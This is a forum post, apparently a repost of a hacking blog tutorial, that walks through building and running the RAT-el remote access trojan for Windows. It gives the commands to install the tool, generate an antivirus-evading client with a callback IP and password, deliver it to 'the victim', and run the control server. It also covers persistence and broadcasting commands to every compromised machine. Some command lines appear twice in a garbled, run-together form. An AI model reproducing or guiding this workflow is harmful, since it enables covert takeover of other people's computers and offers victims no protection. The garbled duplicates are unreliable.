• We just launched and are currently in beta. Join us as we build and grow the community.

RAT-el – Create RAT For Windows and Android

vik681

Innovator
V Rep
0
0
0
Rep
0
V Vouches
0
0
0
Vouches
0
Posts
97
Likes
185
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 300 XP
Red-Computer-Photo-Technology-YouTube-Thumbnail-1.png


Hey Folks, today in this tutorial we are going to tell you about another penetration testing tool called “RAT-el “. RAT-el is an open source penetration test tool that allows you to take control of a windows machine. It works on the client-server model, the server sends commands and the client executes the commands and sends the result back to the server. The client is completely undetectable by anti-virus software.

Let’s take a look 😛 !!

Dependencies

As always this time also we need to install some dependencies before installing this tool.

sudo apt-get install git python3 python3-pip mingw-w641sudo apt-get install git python3 python3-pip mingw-w64

1.png


First of all, you have to download the project of this tool by git command from gihtub. After that you need to go to the “setup” directory of this tool using cd command and finally execute the “pip” command to establish the rest of the dependencies.

git clone https://github.com/FrenchCisco/RATel
cd RATel/setup
pip3 install -r requirement.txt123git clone
https://github.com/FrenchCisco/RATelcd RATel/setuppip3 install-rrequirement.txt

2.png

Setup Client

We will have to return to the main directory of this tool. Now you have to change the IP address, port number and name of this tool according to you.

cd RATel
python3 RATelGenerator.py --port 12345 --ip 192.168.1.12 --name ratel.exe --password secnhack12cd RATelpython3 RATelGenerator.py--port12345--ip192.168.1.12--name ratel.exe--password secnhack

3.png


After the payload is created, the payload will be saved in the “payload” directory. Now you can share it to the victim using any online or offline services.

cd payload/1cd payload/

4.png

Windows Defender

Alright 😛 !! Look at below, windows defender security is enabled.

5.png

Server Setup

Go back to your main kali linux machine and set up the server to capture the client session. Now the connection will be established as soon as the victim clicks on the malicious client service.

cd RATel/server
python3 RATelServer.py --port 12345 --password secnhack --time 5 --clean12cd RATel/serverpython3 RATelServer.py--port12345--password secnhack--time5--clean

6.png


We have no idea what exactly we need to do after getting the session, so we will execute the “-h” command to see all the commands.

7.png

List Session

You can see all established sessions by using the “-ls” command.

8.png


Execute the command by simply selecting the target and its session ID. Now we have got complete control of the target system. After that we will execute the “-h” command to see its usage again.

Usage 😛 –target < ID >

9.png

Execute Command

Now we can execute all the commands associated with cmd prompt on the target system using the “-c” parameter.

10.png

Activate CMD Prompt

Also you can activate CMD prompt by executing the following command.

11.png

Persistence

The persistence module is loaded during Windows startup which we can also create.

12.png

Broadcast

It has another feature by which we can broadcast any message simultaneously to all valid sessions. As you can see in the image below, we have propagated the message of opening the file explorer in each system.

--broadcast
-c "explorer.exe"12--broadcast-c"explorer.exe"

13.png


BOOM 😛 !! As you can see the file explorer prompt is activated in every system which means it works perfectly.

14.png
About the AuthorShubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.
 

442,401

317,942

317,951

Top